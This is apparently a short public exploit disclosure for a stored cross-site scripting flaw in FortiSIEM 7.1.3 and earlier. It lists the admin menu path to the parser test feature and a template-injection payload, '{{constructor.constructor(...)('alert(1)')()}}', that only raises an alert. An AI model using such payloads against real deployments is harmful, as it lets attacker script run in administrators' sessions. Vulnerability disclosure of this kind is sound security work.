# Exploit Title: FortiSiem 7.1.3 Stored XSS
# Google Dork: N/A
# Date: 06.09.2024
# Exploit Author: Ersin Sarisoy
# Vendor Homepage: https://www.fortinet.com/
# Software Link: https://www.fortinet.com/products/siem/fortisiem
# Version: 7.1.3 and below
# Tested on: Kali Linux & Windows
# CVE : N/A


After a classic introduction to FortiSiem

Click Admin>Device Support>Parsers later Test parser Edit>Validate>Test

you should see this:
{{constructor.constructor….

and you should convert that value to:
{{constructor.constructor….('alert(1)')()}}

And click test.